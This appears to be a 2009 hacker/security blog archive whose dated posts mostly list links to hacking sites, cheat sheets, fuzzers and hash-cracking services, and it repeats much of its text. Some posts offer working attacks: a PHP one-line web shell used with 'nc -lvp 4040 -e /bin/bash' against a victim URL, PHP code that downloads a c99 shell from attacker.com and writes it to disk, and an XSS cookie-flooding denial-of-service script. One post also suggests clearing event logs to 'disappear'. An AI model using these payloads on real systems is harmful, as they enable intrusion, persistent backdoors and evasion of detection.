A very well written article on some of the history and details of what a “rootkit” is:
http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly
Friday, May 29, 2009
“Underground Hacking” Links
Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:
http://www.darkc0de.com/index.shtml
http://trythis0ne.com/?page=toolz
http://avhackers.com/index.php
http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)
================================
Un.Aware eZine ( http://www.awarenetwork.org/etc/)
Uninformed eZine ( http://uninformed.org/? )
Phrack eZine ( http://phrack.org/ )
Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )
Tuesday, May 26, 2009
Force Windows Update Script
Stolen from: http://msmvps.com/blogs/athif/pages/66375.aspx
Copy and Paste the code below into a text file and name it AUForceUpdate.cmd
=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client:
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists)
Echo 3. Deletes the DetectionStartTime registry key (if it exists)
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv)
Echo 6. Force the detection
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================
Copy and Paste the code below into a text file and name it AUForceUpdate.cmd
=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client:
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists)
Echo 3. Deletes the DetectionStartTime registry key (if it exists)
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv)
Echo 6. Force the detection
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================
tail -f, I must leave you for another
Stolen from: http://www.shell-fu.org/lister.php?id=820
This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.
Another option is:
The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.
tail -f
This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.
Another option is:
less +F /var/log/messages
The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.
Durzosploit - Javascript Exploit Generator
Takes script('XSS Working'); to the next level:
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction
Sunday, May 24, 2009
Thursday, May 21, 2009
A Cheat, A Method and a Book
So I wanted to get these down before they scrolled by in twitter:
Nick Harbour's Reverse Engineering Cheat Sheet:
http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf
Lenny Zeltser's Reverse Egineering Cheat Sheet:
http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html
And the Unix Toolbox. DO NOT underestimate the power of this booklet:
http://cb.vu/unixtoolbox.xhtml
Nick Harbour's Reverse Engineering Cheat Sheet:
http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf
Lenny Zeltser's Reverse Egineering Cheat Sheet:
http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html
And the Unix Toolbox. DO NOT underestimate the power of this booklet:
http://cb.vu/unixtoolbox.xhtml
Tuesday, May 19, 2009
Defcon CTF and Qualifiers: Past Challenges and Answers
Even if you have never, nor are signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.
http://nopsr.us/
http://nopsr.us/
100 Free Online Courses (MIT and such)
DIY CISS Degree: 100 Open Courses on Computer Information Systems and Security
http://www.computer-colleges.com/blog/2009/diy-ciss-degree-100-open-courses-on-computer-information-systems-and-security/
http://www.computer-colleges.com/blog/2009/diy-ciss-degree-100-open-courses-on-computer-information-systems-and-security/
Tarantula - A fuzzing spider
The only homepage I could find: http://github.com/relevance/tarantula
Their quote:
Haven't tried it yet, plan to.
Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc
Haven't tried it yet, plan to.
Handwriting Analysis book on Scribd
If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:
Handwriting Analysis & Success Secrets by Bart A Baggett
http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett
Handwriting Analysis & Success Secrets by Bart A Baggett
http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett
Danzer - ActiveX Fuzzer
http://www.cert.org/vuls/discovery/dranzer.html
Here is what they say about it:
Here is what they say about it:
Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.
We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.
OfficeCat: Look for Exploits in MS Office Documents
Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.
Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html
Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html
Friday, May 15, 2009
PHP 1-line execute
<?php system($_GET[cmd]);?>
echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.
echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.
Load txt file as PHP
A pretty sick use of php ;-)
$shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
$code = file_get_contents($shell);
$fp=fopen("Sh3ll.php","w+");
fwrite($fp, $code);
fclose($fp);
?>
Huge List of Online Crackers
Don't know if all of these are online still or not:
SOURCE:(http://blackhat.ge/?page_id=29)
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
SOURCE:(http://blackhat.ge/?page_id=29)
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
User Profile Deletion Utility
Great for clean up. Upload, run, clear/fill event logs. Disappear. ;-)
http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en
http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en
Thursday, May 14, 2009
Finding SUID/SGID root programs
Source: http://www.faqs.org/docs/securing/chap5sec62.html
EDIT: It doesn't look like it, but it's all one line:
EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;
Wednesday, May 13, 2009
WIGS - Website Information Gathering Scanner
A TON of information, in one click without touching the site yourself.. ;-)
http://sucuri.net/index.php?page=scan
Also, my other favorite is: http://www.serversniff.net/
http://sucuri.net/index.php?page=scan
Also, my other favorite is: http://www.serversniff.net/
Tuesday, May 12, 2009
LeetUpload.com
An awesome repository of interesting do-dads and toys for hackers / security 'pros'
Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/
Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/
"Official" Metasploit Documentation
Start here:
http://en.wikibooks.org/wiki/Metasploit/Contents
Then here:
http://trac.metasploit.com/wiki/TitleIndex
You can also get an idea of how massive Metasploit is here:
http://www.ohloh.net/p/metasploit/analyses/latest
http://en.wikibooks.org/wiki/Metasploit/Contents
Then here:
http://trac.metasploit.com/wiki/TitleIndex
You can also get an idea of how massive Metasploit is here:
http://www.ohloh.net/p/metasploit/analyses/latest
Hex Editor - Frhed
I've been searching for a free hex editor that had the features I need and the search is finally over.
http://frhed.sourceforge.net/
Thanks @marcusjcarey
http://frhed.sourceforge.net/
Thanks @marcusjcarey
Sunday, May 10, 2009
XSS based Client-side DoS
Makes the client's cookie for the site per subdomain 200kb.
http://pastebin.com/f3dfe04f7
I pasted the code in case it gets lost on Pastebin
http://pastebin.com/f3dfe04f7
/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>
I pasted the code in case it gets lost on Pastebin
Saturday, May 9, 2009
This is why you're fat
Not security related, but hilarious. Come on, who hasn't had a Choco Taco.
http://thisiswhyyourefat.com
http://thisiswhyyourefat.com
Friday, May 8, 2009
Monday, May 4, 2009
Sunday, May 3, 2009
Stock Photo Sites
Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/
Subscribe to:
Posts (Atom)